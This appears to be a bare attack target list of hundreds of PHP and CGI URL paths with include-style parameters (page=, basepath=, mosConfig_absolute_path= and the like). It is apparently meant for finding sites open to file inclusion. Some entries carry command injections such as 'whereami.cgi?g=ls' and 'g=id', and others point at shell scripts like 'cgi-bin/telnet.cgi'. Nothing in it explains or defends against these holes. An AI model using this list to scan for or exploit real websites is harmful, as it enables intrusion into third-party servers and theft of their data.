head.php?left=&#13;
enter.php?phpbb_root_path=&#13;
show.php?z=&#13;
start.php?basepath=&#13;
blank.php?strona=&#13;
template.php?y=&#13;
page.php?where=&#13;
layout.php?category=&#13;
index1.php?my=&#13;
principal.php?phpbb_root_path=&#13;
nota.php?channel=&#13;
page.php?choix=&#13;
start.php?xlink=&#13;
home.php?k=&#13;
standard.php?phpbb_root_path=&#13;
principal.php?middlePart=&#13;
mod*.php?m=&#13;
index.php?recipe=&#13;
template.php?path=&#13;
pagina.php?dir=&#13;
sitio.php?abre=&#13;
index1.php?recipe=&#13;
blank.php?page=&#13;
sub*.php?category=&#13;
*inc*.php?body=&#13;
enter.php?middle=&#13;
home.php?path=&#13;
down*.php?pre=&#13;
base.php?w=&#13;
main.php?path=&#13;
nota.php?ir=&#13;
press.php?link=&#13;
gery.php?pollname=&#13;
down*.php?open=&#13;
down*.php?pageweb=&#13;
default.php?eval=&#13;
view.php?showpage=&#13;
show.php?get=&#13;
sitio.php?tipo=&#13;
layout.php?cont=&#13;
default.php?destino=&#13;
padrao.php?seccion=&#13;
down*.php?r=&#13;
main.php?param=&#13;
standard.php?e=&#13;
down*.php?in=&#13;
nota.php?include=&#13;
sitio.php?secao=&#13;
print.php?my=&#13;
general.php?abre=&#13;
general.php?link=&#13;
default.php?id=&#13;
standard.php?panel=&#13;
show.php?channel=&#13;
enter.php?r=&#13;
index3.php?phpbb_root_path=&#13;
gery.php?where=&#13;
head.php?middle=&#13;
sub*.php?load=&#13;
gery.php?sp=&#13;
show.php?chapter=&#13;
sub*.php?b=&#13;
general.php?adresa=&#13;
print.php?goto=&#13;
sub*.php?sp=&#13;
template.php?doshow=&#13;
padrao.php?base_dir=&#13;
index2.php?my=&#13;
include.php?w=&#13;
start.php?op=&#13;
main.php?section=&#13;
view.php?header=&#13;
layout.php?menue=&#13;
head.php?y=&#13;
sub*.php?content=&#13;
show.php?type=&#13;
base.php?id=&#13;
mod*.php?qry=&#13;
default.php?strona=&#13;
sitio.php?chapter=&#13;
gery.php?index=&#13;
nota.php?h=&#13;
page.php?oldal=&#13;
enter.php?panel=&#13;
blank.php?t=&#13;
start.php?pollname=&#13;
sub*.php?module=&#13;
enter.php?thispage=&#13;
mod*.php?index=&#13;
sitio.php?r=&#13;
sub*.php?play=&#13;
index2.php?doshow=&#13;
index2.php?chapter=&#13;
show.php?path=&#13;
gery.php?to=&#13;
info.php?base_dir=&#13;
gery.php?abre=&#13;
gery.php?pag=&#13;
view.php?channel=&#13;
default.php?mod=&#13;
index.php?op=&#13;
general.php?pre=&#13;
padrao.php?type=&#13;
template.php?pag=&#13;
standard.php?pre=&#13;
blank.php?ref=&#13;
down*.php?z=&#13;
general.php?inc=&#13;
home.php?read=&#13;
pagina.php?section=&#13;
default.php?basepath=&#13;
index.php?pre=&#13;
sitio.php?pageweb=&#13;
base.php?seite=&#13;
*inc*.php?j=&#13;
index2.php?filepath=&#13;
file.php?type=&#13;
index1.php?oldal=&#13;
index2.php?second=&#13;
index3.php?sekce=&#13;
info.php?filepath=&#13;
base.php?opcion=&#13;
path.php?category=&#13;
index3.php?start=&#13;
start.php?rub=&#13;
*inc*.php?i=&#13;
blank.php?pre=&#13;
general.php?channel=&#13;
index2.php?OpenPage=&#13;
page.php?section=&#13;
mod*.php?middle=&#13;
index1.php?goFile=&#13;
blank.php?action=&#13;
principal.php?loader=&#13;
sub*.php?op=&#13;
main.php?addr=&#13;
start.php?mid=&#13;
gery.php?secao=&#13;
pagina.php?tipo=&#13;
index.php?w=&#13;
head.php?where=&#13;
principal.php?tipo=&#13;
press.php?loader=&#13;
gery.php?showpage=&#13;
gery.php?go=&#13;
enter.php?start=&#13;
press.php?lang=&#13;
general.php?p=&#13;
index.php?sekce=&#13;
index2.php?get=&#13;
sitio.php?go=&#13;
include.php?cont=&#13;
sub*.php?where=&#13;
index3.php?index=&#13;
path.php?recipe=&#13;
info.php?loader=&#13;
print.php?sp=&#13;
page.php?phpbb_root_path=&#13;
path.php?body=&#13;
principal.php?menue=&#13;
print.php?cont=&#13;
pagina.php?z=&#13;
default.php?mid=&#13;
blank.php?xlink=&#13;
sub*.php?oldal=&#13;
general.php?b=&#13;
include.php?left=&#13;
print.php?sivu=&#13;
press.php?OpenPage=&#13;
default.php?cont=&#13;
general.php?pollname=&#13;
template.php?nivel=&#13;
enter.php?page=&#13;
file.php?middle=&#13;
standard.php?str=&#13;
gery.php?get=&#13;
main.php?v=&#13;
down*.php?subject=&#13;
enter.php?sivu=&#13;
path.php?option=&#13;
index.php?strona=&#13;
index1.php?choix=&#13;
index2.php?f=&#13;
press.php?destino=&#13;
pagina.php?channel=&#13;
principal.php?b=&#13;
home.php?include=&#13;
head.php?numero=&#13;
general.php?ref=&#13;
main.php?dir=&#13;
gery.php?cont=&#13;
principal.php?type=&#13;
file.php?param=&#13;
default.php?secao=&#13;
path.php?pageweb=&#13;
info.php?r=&#13;
base.php?phpbb_root_path=&#13;
main.php?itemnav=&#13;
view.php?pg=&#13;
pagina.php?choix=&#13;
default.php?itemnav=&#13;
index2.php?cmd=&#13;
layout.php?url=&#13;
index.php?path=&#13;
index1.php?second=&#13;
start.php?modo=&#13;
index1.php?get=&#13;
index3.php?my=&#13;
sub*.php?left=&#13;
print.php?inc=&#13;
view.php?type=&#13;
path.php?*[*]*=&#13;
base.php?adresa=&#13;
index3.php?oldal=&#13;
standard.php?body=&#13;
base.php?path=&#13;
principal.php?strona=&#13;
info.php?l=&#13;
template.php?left=&#13;
head.php?loc=&#13;
page.php?ir=&#13;
print.php?path=&#13;
down*.php?path=&#13;
sitio.php?opcion=&#13;
pagina.php?category=&#13;
press.php?menu=&#13;
index2.php?pref=&#13;
sitio.php?incl=&#13;
show.php?ki=&#13;
index3.php?x=&#13;
page.php?strona=&#13;
*inc*.php?open=&#13;
index3.php?secao=&#13;
standard.php?*[*]*=&#13;
template.php?basepath=&#13;
standard.php?goFile=&#13;
index2.php?ir=&#13;
file.php?modo=&#13;
gery.php?itemnav=&#13;
main.php?oldal=&#13;
down*.php?showpage=&#13;
start.php?destino=&#13;
blank.php?rub=&#13;
path.php?ir=&#13;
layout.php?var=&#13;
index1.php?texto=&#13;
start.php?pg=&#13;
index1.php?showpage=&#13;
info.php?go=&#13;
path.php?load=&#13;
index3.php?abre=&#13;
blank.php?where=&#13;
info.php?start=&#13;
page.php?secao=&#13;
nota.php?pag=&#13;
nota.php?second=&#13;
index2.php?to=&#13;
standard.php?name=&#13;
start.php?strona=&#13;
mod*.php?numero=&#13;
press.php?home=&#13;
info.php?z=&#13;
mod*.php?path=&#13;
blank.php?base_dir=&#13;
base.php?texto=&#13;
nota.php?secc=&#13;
index.php?tipo=&#13;
index.php?goto=&#13;
print.php?pag=&#13;
view.php?secao=&#13;
general.php?strona=&#13;
show.php?my=&#13;
page.php?e=&#13;
padrao.php?index=&#13;
gery.php?thispage=&#13;
start.php?base_dir=&#13;
default.php?tipo=&#13;
gery.php?panel=&#13;
standard.php?ev=&#13;
standard.php?destino=&#13;
general.php?middle=&#13;
main.php?basepath=&#13;
standard.php?q=&#13;
index1.php?tipo=&#13;
mod*.php?choix=&#13;
template.php?ir=&#13;
show.php?adresa=&#13;
general.php?mid=&#13;
index3.php?adresa=&#13;
pagina.php?sec=&#13;
template.php?secao=&#13;
home.php?w=&#13;
general.php?content=&#13;
sub*.php?recipe=&#13;
main.php?category=&#13;
enter.php?viewpage=&#13;
main.php?ir=&#13;
show.php?pageweb=&#13;
principal.php?ir=&#13;
default.php?pageweb=&#13;
index.php?oldal=&#13;
head.php?d=&#13;
gery.php?mid=&#13;
index.php?type=&#13;
standard.php?j=&#13;
show.php?oldal=&#13;
enter.php?link=&#13;
enter.php?content=&#13;
blank.php?filepath=&#13;
standard.php?channel=&#13;
base.php?*[*]*=&#13;
info.php?incl=&#13;
down*.php?include=&#13;
press.php?modo=&#13;
file.php?choix=&#13;
press.php?type=&#13;
blank.php?goto=&#13;
index3.php?showpage=&#13;
principal.php?subject=&#13;
start.php?chapter=&#13;
show.php?r=&#13;
pagina.php?thispage=&#13;
general.php?chapter=&#13;
page.php?base_dir=&#13;
page.php?qry=&#13;
show.php?incl=&#13;
page.php?*[*]*=&#13;
main.php?h=&#13;
file.php?seccion=&#13;
default.php?pre=&#13;
principal.php?index=&#13;
principal.php?inc=&#13;
home.php?z=&#13;
pagina.php?in=&#13;
show.php?play=&#13;
nota.php?subject=&#13;
default.php?secc=&#13;
default.php?loader=&#13;
padrao.php?var=&#13;
mod*.php?b=&#13;
default.php?showpage=&#13;
press.php?channel=&#13;
pagina.php?ev=&#13;
sitio.php?name=&#13;
page.php?option=&#13;
press.php?mid=&#13;
down*.php?corpo=&#13;
view.php?get=&#13;
print.php?thispage=&#13;
principal.php?home=&#13;
show.php?param=&#13;
standard.php?sivu=&#13;
index3.php?panel=&#13;
include.php?play=&#13;
path.php?cmd=&#13;
file.php?sp=&#13;
template.php?section=&#13;
view.php?str=&#13;
blank.php?left=&#13;
nota.php?lang=&#13;
path.php?sivu=&#13;
main.php?e=&#13;
default.php?ref=&#13;
start.php?seite=&#13;
default.php?inc=&#13;
print.php?disp=&#13;
home.php?h=&#13;
principal.php?loc=&#13;
index3.php?sp=&#13;
gery.php?var=&#13;
sub*.php?base_dir=&#13;
path.php?middle=&#13;
pagina.php?str=&#13;
base.php?play=&#13;
base.php?v=&#13;
sitio.php?sivu=&#13;
main.php?r=&#13;
file.php?nivel=&#13;
start.php?sivu=&#13;
template.php?c=&#13;
general.php?second=&#13;
sub*.php?mod=&#13;
home.php?loc=&#13;
head.php?corpo=&#13;
standard.php?op=&#13;
index2.php?inc=&#13;
info.php?pref=&#13;
base.php?basepath=&#13;
print.php?basepath=&#13;
*inc*.php?m=&#13;
base.php?home=&#13;
layout.php?strona=&#13;
padrao.php?url=&#13;
sitio.php?oldal=&#13;
pagina.php?read=&#13;
index1.php?go=&#13;
standard.php?s=&#13;
page.php?eval=&#13;
index.php?j=&#13;
pagina.php?pr=&#13;
start.php?secao=&#13;
template.php?*[*]*=&#13;
nota.php?get=&#13;
index3.php?link=&#13;
home.php?e=&#13;
gery.php?name=&#13;
nota.php?eval=&#13;
sub*.php?abre=&#13;
index2.php?load=&#13;
principal.php?in=&#13;
view.php?load=&#13;
mod*.php?action=&#13;
default.php?p=&#13;
head.php?c=&#13;
template.php?viewpage=&#13;
view.php?mid=&#13;
padrao.php?addr=&#13;
view.php?go=&#13;
file.php?basepath=&#13;
home.php?pre=&#13;
include.php?goFile=&#13;
layout.php?play=&#13;
index1.php?subject=&#13;
info.php?middlePart=&#13;
down*.php?pg=&#13;
sub*.php?body=&#13;
index.php?option=&#13;
sub*.php?chapter=&#13;
default.php?t=&#13;
head.php?opcion=&#13;
nota.php?panel=&#13;
sitio.php?left=&#13;
show.php?include=&#13;
pagina.php?start=&#13;
head.php?choix=&#13;
index3.php?tipo=&#13;
index3.php?choix=&#13;
down*.php?channel=&#13;
base.php?pa=&#13;
nota.php?sekce=&#13;
show.php?l=&#13;
show.php?index=&#13;
blank.php?url=&#13;
start.php?thispage=&#13;
nota.php?play=&#13;
show.php?second=&#13;
enter.php?include=&#13;
principal.php?middle=&#13;
main.php?where=&#13;
padrao.php?link=&#13;
path.php?strona=&#13;
index3.php?read=&#13;
mod*.php?module=&#13;
standard.php?viewpage=&#13;
standard.php?pr=&#13;
*inc*.php?showpage=&#13;
pagina.php?ref=&#13;
path.php?pname=&#13;
padrao.php?mid=&#13;
info.php?eval=&#13;
include.php?path=&#13;
page.php?subject=&#13;
sub*.php?qry=&#13;
head.php?module=&#13;
nota.php?opcion=&#13;
head.php?abre=&#13;
base.php?str=&#13;
home.php?body=&#13;
gery.php?module=&#13;
head.php?sivu=&#13;
page.php?inc=&#13;
pagina.php?header=&#13;
mod*.php?v=&#13;
home.php?doshow=&#13;
padrao.php?n=&#13;
index1.php?chapter=&#13;
padrao.php?basepath=&#13;
index.php?r=&#13;
index3.php?seccion=&#13;
sitio.php?mid=&#13;
index.php?where=&#13;
general.php?type=&#13;
pagina.php?goto=&#13;
page.php?pa=&#13;
default.php?menue=&#13;
main.php?goto=&#13;
index1.php?abre=&#13;
info.php?seccion=&#13;
index2.php?pa=&#13;
layout.php?pageweb=&#13;
nota.php?disp=&#13;
index1.php?body=&#13;
default.php?nivel=&#13;
show.php?header=&#13;
down*.php?pag=&#13;
start.php?tipo=&#13;
standard.php?w=&#13;
index.php?open=&#13;
blank.php?menu=&#13;
general.php?nivel=&#13;
padrao.php?nivel=&#13;
*inc*.php?addr=&#13;
index.php?var=&#13;
home.php?redirect=&#13;
*inc*.php?link=&#13;
*inc*.php?incl=&#13;
padrao.php?corpo=&#13;
down*.php?url=&#13;
enter.php?goto=&#13;
down*.php?addr=&#13;
sub*.php?j=&#13;
principal.php?f=&#13;
sub*.php?menue=&#13;
index2.php?section=&#13;
general.php?my=&#13;
head.php?loader=&#13;
general.php?goto=&#13;
include.php?dir=&#13;
start.php?header=&#13;
blank.php?in=&#13;
base.php?name=&#13;
nota.php?goFile=&#13;
head.php?base_dir=&#13;
mod*.php?recipe=&#13;
press.php?pr=&#13;
padrao.php?*[*]*=&#13;
layout.php?opcion=&#13;
print.php?rub=&#13;
index.php?pr=&#13;
general.php?seite=&#13;
pagina.php?numero=&#13;
*inc*.php?pg=&#13;
nota.php?rub=&#13;
view.php?seite=&#13;
pagina.php?recipe=&#13;
index.php?pref=&#13;
page.php?action=&#13;
page.php?ev=&#13;
show.php?ir=&#13;
head.php?index=&#13;
mod*.php?pname=&#13;
view.php?ir=&#13;
*inc*.php?start=&#13;
principal.php?rub=&#13;
principal.php?corpo=&#13;
padrao.php?middle=&#13;
base.php?pname=&#13;
template.php?header=&#13;
view.php?sp=&#13;
main.php?name=&#13;
nota.php?m=&#13;
blank.php?open=&#13;
head.php?dir=&#13;
page.php?pname=&#13;
*inc*.php?k=&#13;
index.php?pollname=&#13;
head.php?oldal=&#13;
index1.php?str=&#13;
template.php?choix=&#13;
down*.php?pollname=&#13;
page.php?recipe=&#13;
template.php?corpo=&#13;
nota.php?sec=&#13;
info.php?*[*]*=&#13;
sub*.php?*[*]*=&#13;
page.php?q=&#13;
index1.php?type=&#13;
gery.php?y=&#13;
standard.php?lang=&#13;
gery.php?page=&#13;
index.php?action=&#13;
press.php?pname=&#13;
down*.php?v=&#13;
index3.php?second=&#13;
show.php?recipe=&#13;
main.php?pre=&#13;
file.php?numero=&#13;
print.php?str=&#13;
standard.php?link=&#13;
nota.php?OpenPage=&#13;
view.php?pollname=&#13;
print.php?l=&#13;
index.php?go=&#13;
standard.php?numero=&#13;
view.php?pr=&#13;
down*.php?read=&#13;
down*.php?action=&#13;
index1.php?OpenPage=&#13;
principal.php?left=&#13;
mod*.php?start=&#13;
file.php?body=&#13;
gery.php?pg=&#13;
blank.php?qry=&#13;
base.php?eval=&#13;
default.php?left=&#13;
gery.php?param=&#13;
blank.php?pa=&#13;
nota.php?b=&#13;
path.php?loader=&#13;
start.php?o=&#13;
include.php?include=&#13;
nota.php?corpo=&#13;
enter.php?second=&#13;
sub*.php?pname=&#13;
mod*.php?pageweb=&#13;
principal.php?addr=&#13;
standard.php?action=&#13;
template.php?lang=&#13;
include.php?basepath=&#13;
sub*.php?ir=&#13;
down*.php?nivel=&#13;
path.php?opcion=&#13;
print.php?category=&#13;
print.php?menu=&#13;
layout.php?secao=&#13;
template.php?param=&#13;
standard.php?ref=&#13;
base.php?include=&#13;
blank.php?body=&#13;
path.php?pref=&#13;
print.php?g=&#13;
padrao.php?subject=&#13;
nota.php?modo=&#13;
index3.php?loader=&#13;
template.php?seite=&#13;
general.php?pageweb=&#13;
index2.php?param=&#13;
path.php?nivel=&#13;
page.php?pref=&#13;
press.php?pref=&#13;
enter.php?ev=&#13;
standard.php?middle=&#13;
index2.php?recipe=&#13;
blank.php?dir=&#13;
home.php?pageweb=&#13;
view.php?panel=&#13;
down*.php?home=&#13;
head.php?ir=&#13;
mod*.php?ir=&#13;
show.php?pagina=&#13;
default.php?base_dir=&#13;
show.php?loader=&#13;
path.php?mid=&#13;
blank.php?abre=&#13;
down*.php?choix=&#13;
info.php?opcion=&#13;
page.php?loader=&#13;
principal.php?oldal=&#13;
index1.php?load=&#13;
home.php?content=&#13;
pagina.php?sekce=&#13;
file.php?n=&#13;
include.php?redirect=&#13;
print.php?itemnav=&#13;
enter.php?index=&#13;
print.php?middle=&#13;
sitio.php?goFile=&#13;
head.php?include=&#13;
enter.php?e=&#13;
index.php?play=&#13;
enter.php?id=&#13;
view.php?mod=&#13;
show.php?nivel=&#13;
file.php?channel=&#13;
layout.php?choix=&#13;
info.php?body=&#13;
include.php?go=&#13;
index3.php?nivel=&#13;
sub*.php?include=&#13;
path.php?numero=&#13;
principal.php?header=&#13;
main.php?opcion=&#13;
enter.php?s=&#13;
sub*.php?pre=&#13;
include.php?index=&#13;
gery.php?pageweb=&#13;
padrao.php?path=&#13;
info.php?url=&#13;
press.php?ev=&#13;
index1.php?pg=&#13;
print.php?in=&#13;
general.php?modo=&#13;
head.php?ki=&#13;
press.php?my=&#13;
index1.php?pollname=&#13;
principal.php?to=&#13;
default.php?play=&#13;
page.php?g=&#13;
nota.php?pg=&#13;
blank.php?destino=&#13;
blank.php?z=&#13;
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=&#13;
module_db.php?pivot_path= module_db.php?pivot_path="&#13;
/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir="&#13;
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=&#13;
com_extended_registration&#13;
smarty_config.php?root_dir= "smarty"&#13;
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr&#13;
send_reminders.php?includedir= "send_reminders.php?includedir="&#13;
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery&#13;
inc/functions.inc.php?config[ppa_root_path]= "Index – Albums" index.php&#13;
/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg"&#13;
[Script Path]/admin/index.php?o= admin/index.php";&#13;
/admin/index.php?o= admin/index.php";&#13;
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine&#13;
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar&#13;
admin/doeditconfig.php?thispath=../includes&amp;config[path]= "admin"&#13;
/components/com_simpleboard/image_upload.php?sbp= com_simpleboard"&#13;
components/com_simpleboard/image_upload.php?sbp= com_simpleboard"&#13;
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine&#13;
mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=&#13;
zentrack/index.php?configFile=&#13;
inst/index.php?lng=../../include/main.inc&amp;G_PATH=&#13;
pivot/modules/module_db.php?pivot_path=&#13;
include/write.php?dir=&#13;
includes/header.php?systempath=&#13;
becommunity/community/index.php?pageurl=&#13;
agendax/addevent.inc.php?agendax_path=&#13;
myPHPCalendar/admin.php?cal_dir=&#13;
yabbse/Sources/Packages.php?sourcedir=&#13;
zboard/zboard.php&#13;
path_of_cpcommerce/_functions.php?prefix&#13;
dotproject/modules/projects/addedit.php?root_dir=&#13;
dotproject/modules/projects/view.php?root_dir=&#13;
dotproject/modules/projects/vw_files.php?root_dir=&#13;
dotproject/modules/tasks/addedit.php?root_dir=&#13;
dotproject/modules/tasks/viewgantt.php?root_dir=&#13;
My_eGery/public/displayCategory.php?basepath=&#13;
modules/My_eGery/public/displayCategory.php?basepath=&#13;
modules/4nAlbum/public/displayCategory.php?basepath=&#13;
modules/coppermine/themes/default/theme.php?THEME_DIR=&#13;
modules/agendax/addevent.inc.php?agendax_path=&#13;
modules/xoopsgery/upgrade_album.php?GERY_BASEDIR=&#13;
modules/xgery/upgrade_album.php?GERY_BASEDIR=&#13;
modules/coppermine/include/init.inc.php?CPG_M_DIR=&#13;
shoutbox/expanded.php?conf=&#13;
library/editor/editor.php?root=&#13;
library/lib.php?root=&#13;
e107/e107_handlers/secure_img_render.php?p=&#13;
main.php?x=&#13;
*default.php?page=&#13;
*default.php?body=&#13;
*index.php?url=&#13;
*index.php?arquivo=&#13;
index.php?include=&#13;
index.php?visualizar=&#13;
index.php?pagina=&#13;
index.php?page=&#13;
index.php?p=&#13;
index.php?cont=&#13;
index.php?x=&#13;
index.php?cat=&#13;
index.php?site=&#13;
index.php?configFile=&#13;
index.php?do=&#13;
index2.php?x=&#13;
Index.php?id=&#13;
template.php?pagina&#13;
inc/step_one_tables.php?server_inc=&#13;
GradeMap/index.php?page=&#13;
admin.php?cal_dir=&#13;
path_of_cpcommerce/_functions.php?prefix=&#13;
contacts.php?cal_dir=&#13;
convert-date.php?cal_dir=&#13;
album_portal.php?phpbb_root_path=&#13;
mainfile.php?MAIN_PATH=&#13;
dotproject/modules/files/index_table.php?root_dir=&#13;
gery/init.php?HTTP_POST_VARS=&#13;
pm/lib.inc.php?pm_path=&#13;
ideabox/include.php?gorumDir=&#13;
cgi-bin/index.cgi?page=&#13;
cgi-bin/awstats.pl?update=1&amp;logfile=&#13;
cgi-bin/awstats/awstats.pl?configdir&#13;
cgi-bin/ikonboard.cgi&#13;
cgi-bin/acart/acart.pl?&amp;page=&#13;
cgi-bin/quikstore.cgi?category=&#13;
cgi-bin/ubb/ubb.cgi?g=&#13;
cgi-bin/hinsts.pl?&#13;
cgi-bin/bp/bp-lib.pl?g=&#13;
ccbill/whereami.cgi?g=ls&#13;
cgi-bin/telnet.cgi&#13;
cgi-bin/1/cmd.cgi&#13;
calendar.pl?command=login&amp;fromTemplate=&#13;
encore/forumcgi/display.cgi?preftemp=temp&amp;page=anonymous&amp;file=&#13;
events.cgi?t=&#13;
powerup.cgi?a=latest&amp;t=&#13;
lc.cgi?a=&#13;
news.cgi?a=114&amp;t=&#13;
biznews.cgi?a=33&amp;t=&#13;
jobs.cgi?a=9&amp;t=&#13;
articles.cgi?a=34&amp;t=&#13;
events.cgi?a=155&amp;t=&#13;
latinbitz.cgi?t=&#13;
newsdesk.cgi?t=&#13;
media.cgi?a=11&amp;t=&#13;
reporter.cgi?t=&#13;
news.cgi?t=&#13;
newsupdate.cgi?a=latest&amp;t=&#13;
deportes.cgi?a=latest&amp;t=&#13;
news.cgi?a=latest&amp;t=&#13;
whereami.cgi?g=id&#13;
auktion.pl?menue=&#13;
i-m/i-m.cgi?p=&#13;
vote.pl?action=show&amp;id=&#13;
shop.pl/page=&#13;
newsdesk.cgi?a=latest&amp;t=&#13;
fileseek.cgi?head=&amp;foot=&#13;
cgi-bin/probe.cgi?olddat=&#13;
emsgb/easymsgb.pl?print=&#13;
app/webeditor/login.cgi?username=&amp;command=simple&amp;do=edit&amp;password=&amp;file=&#13;
csv_db/csv_db.cgi?fil e=file.extention&#13;
cgi-bin/jammail.pl?job=showoldmail&amp;mail=&#13;
cgi-bin/bbs/read.cgi?file=&#13;
support_page.cgi?file_name=&#13;
index.php?include=&#13;
index.php?open=&#13;
index.php?visualizar=&#13;
main.php?x=&#13;
main.php?page=&#13;
index.php?meio.php=&#13;
index.php?page=&#13;
index.php?action=&#13;
index5.php?configFile=&#13;
index5.php?page=&#13;
index5.php?content=&#13;
index5.php?x=&#13;
index5.php?open=&#13;
index5.php?m=&#13;
index5.php?site=&#13;
index5.php?cat=&#13;
index.php?d=&#13;
index.php?a=&#13;
index.php?b=&#13;
index.php?c=&#13;
index.php?e=&#13;
index.php?f=&#13;
index.php?g=&#13;
index.php?h=&#13;
index.php?i=&#13;
index.php?j=&#13;
index.php?k=&#13;
index.php?l=&#13;
index.php?m=&#13;
index.php?n=&#13;
index.php?o=&#13;
index.php?p=&#13;
index.php?q=&#13;
index.php?r=&#13;
index.php?s=&#13;
index.php?t=&#13;
index.php?u=&#13;
index.php?v=&#13;
index.php?x=&#13;
index.php?y=&#13;
index.php?z=&#13;
index.php?loc=&#13;
index.php?seite=&#13;
index2.php?d=&#13;
index2.php?a=&#13;
index.php?ir=&#13;
index.php?secao=&#13;
index2.php?b=&#13;
index2.php?c=&#13;
index2.php?e=&#13;
index2.php?f=&#13;
index2.php?g=&#13;
index2.php?h=&#13;
index2.php?i=&#13;
index2.php?j=&#13;
index2.php?k=&#13;
index2.php?l=&#13;
index2.php?m=&#13;
index2.php?n=&#13;
index2.php?o=&#13;
index2.php?p=&#13;
index2.php?q=&#13;
index2.php?r=&#13;
index2.php?s=&#13;
index2.php?t=&#13;
index2.php?u=&#13;
index2.php?v=&#13;
index2.php?x=&#13;
index2.php?y=&#13;
index2.php?z=&#13;
index5.php?inc=&#13;
index5.php?pg=&#13;
index5.php?lv1=&#13;
index.php?sub=&#13;
index.php?sub2=&#13;
index.php?pg=&#13;
index.php?lv1=&#13;
index.php?directfile=&#13;
index.php?funcion=&#13;
index.php?ll=&#13;
index.php?lnk=&#13;
index5.php?main=&#13;
index5.php?include=&#13;
index5.php?root=&#13;
index5.php?pagina=&#13;
index.php?theme=&#13;
index.php?acao=&#13;
index5.php?cont=&#13;
index5.php?pag=&#13;
index5.php?p=&#13;
index5.php?lang=&#13;
index5.php?language=&#13;
template.php?pagina=&#13;
llindex.php?sub=&#13;
index2.php?pg=&#13;
index2.php?lv1=&#13;
index2.php?sub=&#13;
index2.php?directfile=&#13;
index2.php?funcion=&#13;
index2.php?sub2=&#13;
index2.php?ll=&#13;
index2.php?lnk=&#13;
index5.php?body=&#13;
index5.php?visualizar=&#13;
index5.php?do=&#13;
index2.php?theme=&#13;
index2.php?acao=&#13;
index2:php?aa=&#13;
index3:php?aa=&#13;
index.php?server=&#13;
index.php?cal=&#13;
index.php?prefix=&#13;
index.php?root_PATH=&#13;
index.php?path=&#13;
index.php?gorumdir=&#13;
index2.php?cont=&#13;
index2.php?server=&#13;
index2.php?cal=&#13;
index2.php?prefix=&#13;
index2.php?root_PATH=&#13;
index2.php?path= AKI&#13;
exibir.php?abre=&#13;
exibir.php?page=&#13;
exibir.php?get=&#13;
exibir.php?p=&#13;
exibir.php?lang=&#13;
index2.php?gorumdir=&#13;
index2.php?pag=&#13;
index2.php?lang=&#13;
index2.php?language=&#13;
index2.php?content=&#13;
index.php?middle=&#13;
step_one_tables.php?server_inc=&#13;
grademade/index.php?page=&#13;
phpshop/index.php?base_dir=&#13;
admin.php?cal_dir=&#13;
_functions.php?prefix=&#13;
contacts.php?cal_dir=&#13;
convert-date.php?cal_dir=&#13;
album_portal.php?phpbb_root_path=&#13;
mainfile.php?MAIN_PATH=&#13;
index_table.php?root_dir=&#13;
affich.php?base=&#13;
init.php?HTTP_POST_VARS=&#13;
lib.inc.php?pm_path=&#13;
include.php?gorumDir=&#13;
start_lobby.php?CONFIG[MWCHAT_Libs]=&#13;
index.php?configFile=&#13;
module_db.php?pivot_path=&#13;
index.php?lng=../../include/main.inc&amp;G_PATH=&#13;
initdb.php?absolute_path=&#13;
step_one.php?server_inc=&#13;
pipe.php?HCL_path=&#13;
write.php?dir=&#13;
new-visitor.inc.php?lvc_include_dir=&#13;
header.php?systempath=&#13;
theme.php?THEME_DIR=&#13;
index.php?pageurl=&#13;
expanded.php?conf=&#13;
addevent.inc.php?agendax_path=&#13;
Packages.php?sourcedir=&#13;
_functions.php?prefix&#13;
addedit.php?root_dir=&#13;
view.php?root_dir=&#13;
vw_files.php?root_dir=&#13;
viewgantt.php?root_dir=&#13;
displayCategory.php?basepath=&#13;
default/theme.php?THEME_DIR=&#13;
upgrade_album.php?GERY_BASEDIR=&#13;
init.inc.php?CPG_M_DIR=&#13;
mod_mainmenu.php?mosConfig_absolute_path=&#13;
editor.php?root=&#13;
lib.php?root=&#13;
secure_img_render.php?p=&#13;
default.php?page=&#13;
arquivo.php?data=&#13;
word.php?id=&#13;
mod.php?mod=&#13;
index.php?plugin=&#13;
sendpage.php?page=&#13;
index.php?hl=&#13;
modules.php?op=&#13;
index.php?templateid=&#13;
article.php?sid=&#13;
.php?my="&#13;
.php?a="&#13;
.php?f="&#13;
.php?z="&#13;
.php?zo="&#13;
.php?la="&#13;
.php?perm="&#13;
.php?item_id="&#13;
.php?f_content="&#13;
.php?from="&#13;
.php?mid="&#13;
.php?lest="&#13;
.php?east="&#13;
.gov.br/index.php?arquivo=&#13;
index.php?ver=&#13;
/contenido/classes/class.inuse.php&#13;
news.php?CONFIG[script_path]=&#13;
index.php?vpagina=&#13;
index.php?arq=&#13;
index.php?pg_ID=&#13;
index.php?pg=&#13;
home.php?page=&#13;
*/newbb/print.php?forum=*topic_id=*"&#13;
*/newbb_plus/*="&#13;
*/news/archive.php?op=*year=*month=*"&#13;
.php?abrir="&#13;
.php?act="&#13;
.php?action="&#13;
.php?ad="&#13;
.php?archive="&#13;
.php?area="&#13;
.php?article="&#13;
.php?b="&#13;
*/tsep/include/colorswitch.php?tsep_config[absPath]=*"&#13;
.php?back="&#13;
.php?base="&#13;
.php?basedir="&#13;
.php?bbs="&#13;
.php?board_no="&#13;
.php?body="&#13;
.php?c="&#13;
.php?cal_dir="&#13;
.php?cat="&#13;
/include/init.inc.php?CPG_M_DIR="&#13;
/includes/mx_functions_ch.php?phpbb_root_path="&#13;
/modules/MyGuests/signin.php?_AMGconfig[cfg_serverpath]="&#13;
.php?_REQUEST=&amp;_REQUEST[option]=com_content&amp;_REQUEST[Itemid]=1&amp;GLOBALS=&amp;mosConfig_absolute_path="&#13;
.php?subd="&#13;
.php?subdir="&#13;
.php?category="&#13;
.php?choice="&#13;
.php?class="&#13;
.php?club_id="&#13;
.php?cod.tipo="&#13;
.php?cod="&#13;
.php?conf="&#13;
.php?configFile="&#13;
.php?cont="&#13;
.php?corpo="&#13;
.php?cvsroot="&#13;
.php?d="&#13;
.php?da="&#13;
.php?date="&#13;
.php?debug="&#13;
